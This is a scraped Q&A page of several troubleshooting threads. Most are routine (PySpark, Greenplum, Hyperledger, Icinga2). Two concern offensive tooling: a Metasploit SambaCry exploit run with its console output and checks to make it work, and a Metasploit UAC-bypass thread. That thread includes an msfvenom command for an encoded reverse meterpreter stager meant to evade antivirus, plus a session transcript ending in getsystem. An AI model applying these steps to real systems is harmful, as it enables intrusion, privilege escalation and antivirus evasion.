unable to exploit SambaCry vulnerability using metasploit - metasploit

I am trying to exploit the SambaCry vulnerability (CVE-2017-7494) on a Linux target for some research work using the Metasploit framework, but I get the following error:
msf exploit(is_known_pipename) > run
[*] Started reverse TCP handler on 192.168.78.136:4444
[*] 192.168.78.139:445 - Using location \\192.168.78.139\myshare\ for the path
[*] 192.168.78.139:445 - Retrieving the remote path of the share 'myshare'
[*] 192.168.78.139:445 - Share 'myshare' has server-side path '/shared'
[*] 192.168.78.139:445 - Uploaded payload to \\192.168.78.139\myshare\BsdRHcSh.so
[*] 192.168.78.139:445 - Loading the payload from server-side path /shared/BsdRHcSh.so using \\PIPE\/shared/BsdRHcSh.so...
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.168.78.139:445 - Loading the payload from server-side path /shared/BsdRHcSh.so using /shared/BsdRHcSh.so...
[-] 192.168.78.139:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] Exploit completed, but no session was created.
Is it because my target host is not vulnerable, or is there some other issue? My target host has Samba version 3.6.23, which as far as I know is vulnerable.
thanks

Failed to load STATUS_OBJECT_NAME_NOT_FOUND means "the object name is not found".
Probably Metasploit failed to upload the payload to the shared folder.
Can you run nmap to verify the presence of the vulnerability? The command is
nmap -p445 --script smb-vuln-cve-2017-7494 TARGET_IP
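As an additional check (a sketch, assuming smbclient is installed and the share allows guest access; the file names here are just examples), you can confirm the Samba version the server advertises and that 'myshare' is actually writable, since is_known_pipename has to upload a .so that it can later load:

# list shares; on SMB1 servers the Samba version appears in the banner
smbclient -L //192.168.78.139 -N

# verify the share accepts an upload
echo probe > /tmp/probe.txt
smbclient //192.168.78.139/myshare -N -c 'put /tmp/probe.txt probe.txt; ls'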

Related

Jupyter Notebook error while using PySpark Kernel: the code failed because of a fatal error: Error sending http request

I am using Jupyter Notebook's PySpark kernel. I have successfully selected the PySpark kernel, but I keep getting the error below:
The code failed because of a fatal error:
Error sending http request and maximum retry encountered..
Some things to try:
a) Make sure Spark has enough available resources for Jupyter to create a Spark context.
b) Contact your Jupyter administrator to make sure the Spark magics library is configured correctly.
c) Restart the kernel.
Here's the log as well:
2019-10-10 13:37:43,741 DEBUG SparkMagics Initialized spark magics.
2019-10-10 13:37:43,742 INFO EventsHandler InstanceId: 32a21583-6879-4ad5-88bf-e07af0b09387,EventName: notebookLoaded,Timestamp: 2019-10-10 10:37:43.742475
2019-10-10 13:37:43,744 DEBUG python_jupyter_kernel Loaded magics.
2019-10-10 13:37:43,744 DEBUG python_jupyter_kernel Changed language.
2019-10-10 13:37:44,356 DEBUG python_jupyter_kernel Registered auto viz.
2019-10-10 13:37:45,440 INFO EventsHandler InstanceId: 32a21583-6879-4ad5-88bf-e07af0b09387,EventName: notebookSessionCreationStart,Timestamp: 2019-10-10 10:37:45.440323,SessionGuid: d230b1f3-6bb1-4a66-bde1-7a73a14d7939,LivyKind: pyspark
2019-10-10 13:37:49,591 ERROR ReliableHttpClient Request to 'http://localhost:8998/sessions' failed with 'HTTPConnectionPool(host='localhost', port=8998): Max retries exceeded with url: /sessions (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x0000013184159808>: Failed to establish a new connection: [WinError 10061] No connection could be made because the target machine actively refused it'))'
2019-10-10 13:37:49,591 INFO EventsHandler InstanceId: 32a21583-6879-4ad5-88bf-e07af0b09387,EventName: notebookSessionCreationEnd,Timestamp: 2019-10-10 10:37:49.591650,SessionGuid: d230b1f3-6bb1-4a66-bde1-7a73a14d7939,LivyKind: pyspark,SessionId: -1,Status: not_started,Success: False,ExceptionType: HttpClientException,ExceptionMessage: Error sending http request and maximum retry encountered.
2019-10-10 13:37:49,591 ERROR SparkMagics Error creating session: Error sending http request and maximum retry encountered.
Note that I am trying to configure this on Windows.
Thanks a lot.
I faced the same issue. You can solve it by not using a PySpark kernel (notebook) but a Python 3 kernel (notebook). I used the following code to set up the Spark session:
import findspark
findspark.init()  # locate the local Spark installation before importing pyspark

import pyspark
from pyspark.sql import SparkSession

# May take a while locally
spark = SparkSession.builder.appName("test").getOrCreate()
spark
If you are trying to connect your Jupyter Notebook to a Spark server through Livy (e.g. AWS Glue Development Endpoint), you have to replace "localhost" with the Spark server IP address in: ~/.sparkmagic/config.json
As mentioned here:
https://aws.amazon.com/blogs/machine-learning/build-amazon-sagemaker-notebooks-backed-by-spark-in-amazon-emr/
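For reference, the relevant entries in ~/.sparkmagic/config.json look roughly like this (a sketch; the exact keys depend on your sparkmagic version, and YOUR_SPARK_SERVER_IP is a placeholder for the Livy endpoint address):

"kernel_python_credentials": {
  "username": "",
  "password": "",
  "url": "http://YOUR_SPARK_SERVER_IP:8998",
  "auth": "None"
}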
Posting the answer below as it may help someone facing this issue when using a SageMaker notebook with a Glue dev endpoint.
I received the same error message in my PySpark kernel notebook. In my case the issue was a missing lifecycle configuration on the notebook instance, which had somehow been removed. I delete and recreate the dev endpoint every day, but the lifecycle config normally remains attached to the notebook.

failed to install greenplum command center when running gpccinstall

I downloaded greenplum-cc-web-4.6.1-LINUX-x86_64.zip for my Greenplum DB 5.18 and followed this link (https://gpcc.docs.pivotal.io/460/topics/setup-collection-agents.html) to install Command Center. Everything was OK until gpccinstall failed. It showed the following errors:
RunCommandOnEachHost fail on host: client-gp03.bj
Error when unzip remote binary on sdw3 bin/gpccws
bin/ccagent
bin/gpcc
conf/app.conf
gpcc_path.sh
bin/start_agent.sh
bin/queryinfocat.sh
bin/gpcc_md5
ccdata/
alert-email/alertTemplate.html
alert-email/send_alert.sh.sample
languages/
languages/zh.json
languages/en.json
Error when unzip remote binary on client-gp00.bj bin/gpccws
bin/ccagent
bin/gpcc
conf/app.conf
gpcc_path.sh
bin/start_agent.sh
bin/queryinfocat.sh
bin/gpcc_md5
ccdata/
alert-email/alertTemplate.html
alert-email/send_alert.sh.sample
languages/
languages/zh.json
languages/en.json
Error when unzip remote binary on client-gp01.bj bin/gpccws
bin/ccagent
bin/gpcc
conf/app.conf
gpcc_path.sh
bin/start_agent.sh
bin/queryinfocat.sh
bin/gpcc_md5
ccdata/
alert-email/alertTemplate.html
alert-email/send_alert.sh.sample
languages/
languages/zh.json
languages/en.json
Error when unzip remote binary on client-gp02.bj bin/gpccws
bin/ccagent
bin/gpcc
conf/app.conf
gpcc_path.sh
bin/start_agent.sh
bin/queryinfocat.sh
bin/gpcc_md5
ccdata/
alert-email/alertTemplate.html
alert-email/send_alert.sh.sample
languages/
languages/zh.json
languages/en.json
Error when unzip remote binary on client-gp03.bj Warning: the ECDSA host key for 'client-gp03.bj' differs from the key for the IP address '10.136.173.8'
Offending key for IP in /home/gpadmin/.ssh/known_hosts:10
Matching host key in /home/gpadmin/.ssh/known_hosts:17
tar: bin/gpccws: Cannot open: File exists
tar: Exiting with failure status due to previous errors
RunCommandOnEachHost failure happened
Has anyone encountered this issue before? I searched Google and the Pivotal community, but failed to find a solution. Any help is appreciated.
BTW, when I ignored the above errors and continued, I found the GPCC web server could be started successfully. When I logged in, only the "Query Monitor" UI section showed a warning: "GPCC is no longer receiving updates. Check your network status or gpcc status and refresh this page." The rest of the UI seems OK.
From here:
Error when unzip remote binary on client-gp03.bj Warning: the ECDSA host key for 'client-gp03.bj' differs from the key for the IP address '10.136.173.8'
Offending key for IP in /home/gpadmin/.ssh/known_hosts:10
Matching host key in /home/gpadmin/.ssh/known_hosts:17
tar: bin/gpccws: Cannot open: File exists
tar: Exiting with failure status due to previous errors
You have conflicting SSH host key entries in your /home/gpadmin/.ssh/known_hosts file. I recommend removing both lines 10 and 17 from that file, then running ssh-keyscan client-gp03.bj >> /home/gpadmin/.ssh/known_hosts
After this is complete, try SSHing to the host to confirm the fingerprint error is cleared up, and if so, try the GPCC installation again.
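A rough sketch of that cleanup, assuming gpadmin is the installing user (ssh-keygen -R removes entries by hostname or IP, so you don't have to edit line numbers by hand):

ssh-keygen -f /home/gpadmin/.ssh/known_hosts -R client-gp03.bj
ssh-keygen -f /home/gpadmin/.ssh/known_hosts -R 10.136.173.8
ssh-keyscan client-gp03.bj >> /home/gpadmin/.ssh/known_hosts
ssh client-gp03.bj hostname   # should now connect without a host key warning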

BYFN.sh failed with error when setting up MSP of type bccsp

I am trying the first-network demo on OS X and am getting the following error. I have tried searching for an answer; I did find one here, but it appears to be for Ubuntu, and none of those commands worked on OS X.
Can anyone suggest a solution on OS X? Thanks!
2018-11-02 03:13:45.696 UTC [main] main -> ERRO 001 Cannot run peer
because error when setting up MSP of type bccsp from directory
/opt/gopath/src/github.com/hyperledger/fabric/peer/crypto/peerOrganizations/org1.example.com/users/Admin@org1.example.com/msp:
could not initialize BCCSP Factories: Failed initializing PKCS11.BCCSP
%!s(<nil>): Could not initialize BCCSP PKCS11 [Failed to initialize
software key store: An invalid KeyStore path provided. Path cannot be
an empty string.] !!!!!!!!!!!!!!! Channel creation failed
!!!!!!!!!!!!!!!!
========= ERROR !!! FAILED to execute End-2-End Scenario ==========
The error message is not very specific.
In my case, I was trying to connect to a peer from my fabric-tools container, and there was a TLS mismatch (fabric-tools had TLS enabled, while fabric-peer had TLS disabled). Aligning the TLS configuration made the error go away.
Might help someone out...
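For illustration, a minimal sketch of what aligning the TLS configuration can look like from the tools/CLI container, assuming the standard first-network names (orderer.example.com:7050, mychannel) and with $ORDERER_CA standing in for the orderer's TLS CA certificate path:

# match the peer's setting (TLS disabled on the peer in my case)
export CORE_PEER_TLS_ENABLED=false
peer channel create -o orderer.example.com:7050 -c mychannel -f ./channel-artifacts/channel.tx

# if the peer does use TLS, enable it and pass the orderer CA cert instead:
# export CORE_PEER_TLS_ENABLED=true
# peer channel create -o orderer.example.com:7050 -c mychannel -f ./channel-artifacts/channel.tx --tls --cafile $ORDERER_CA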

Icinga2 does not start because it could not load the library "db_ido_mysql"

Here is the error:
root@taurus:/etc/icinga2/features-available# service icinga2 checkconfig
* checking Icinga2 configuration
information/cli: Icinga application loader (version: r2.7.2-1)
information/cli: Loading configuration file(s).
critical/config: Error: Error while evaluating expression: Could not load library 'libdb_ido_mysql.so.2.7.2': libdb_ido_mysql.so.2.7.2: cannot open shared object file: No such file or directory
Location: in /etc/icinga2/features-enabled/ido-mysql.conf: 6:1-6:22
/etc/icinga2/features-enabled/ido-mysql.conf(4): */
/etc/icinga2/features-enabled/ido-mysql.conf(5):
/etc/icinga2/features-enabled/ido-mysql.conf(6): library "db_ido_mysql"
^^^^^^^^^^^^^^^^^^^^^^
/etc/icinga2/features-enabled/ido-mysql.conf(7):
/etc/icinga2/features-enabled/ido-mysql.conf(8): object IdoMysqlConnection "ido-mysql" {
* checking Icinga2 configuration. Check '/var/log/icinga2/startup.log' for details.
root@taurus:/etc/icinga2/features-available# icinga2 feature list
Disabled features: command compatlog debuglog gelf graphite influxdb livestatus opentsdb perfdata statusdata syslog
Enabled features: api checker ido-mysql ido-pgsql mainlog notification
Does anybody know what I did wrong during the installation?
The installation itself reported no problems, so I don't understand where this error comes from.
Do you want to use Icingaweb2 with your Icinga2 installation? Then you have to install the
icinga2-ido-mysql
package for your distribution and configure it. Here you can find step-by-step instructions on how to install and configure it. If not, disable the following features:
ido-mysql ido-pgsql
Regards,
Jan
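A rough sketch of both options (Debian/Ubuntu package name and service commands shown; they may differ on your distribution):

# option 1: keep the MySQL IDO backend for Icingaweb2
apt-get install icinga2-ido-mysql
icinga2 feature enable ido-mysql
service icinga2 checkconfig && service icinga2 restart

# option 2: drop the IDO features if you don't use them
icinga2 feature disable ido-mysql ido-pgsql
service icinga2 checkconfig && service icinga2 restart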

metasploit: bypassuac windows privilege escalation hangs

post/windows/escalate/bypassuac seems to fail for me
For some reason I can't get the post-exploitation module bypassuac to work.
This is what I did:
Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
Put the session in background
Tried to use the post exploitation module like this:
use post/windows/escalate/bypassuac
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444
exploit
The port is not in use yet, so that should be fine.
The output is as follows:
[-] Handler failed to bind to 192.168.1.100:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Post module execution completed
Then it returns to the console and does nothing, no new session, nothing whatsoever.
I checked the following things:
Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
Checked whether the executable set off the virus scanner's alarm bells. It didn't.
Is there a way of manually running the executable, and could someone explain to me how that would open a new meterpreter session with SYSTEM-level access?
Or can I somehow encode the payload and use my custom template to evade antivirus? I haven't found any option to encode post-exploitation modules yet.
Thanks in advance
Halvar
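For the encoding question, one common approach (a sketch only; it assumes a newer Metasploit with msfvenom available, and your_template.exe is a placeholder for whatever custom template you want to use) is to generate the encoded agent yourself:

# generate an encoded meterpreter stager inside a custom template executable
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 -x your_template.exe -k -f exe -o encoded_agent.exe

Whether that actually evades a given antivirus product varies; the module's own agent upload (shown in the transcript below) does not use a custom template.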
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.
msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit
[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect...
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)
msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getsystem
...got system (via technique 1).
meterpreter > sysinfo
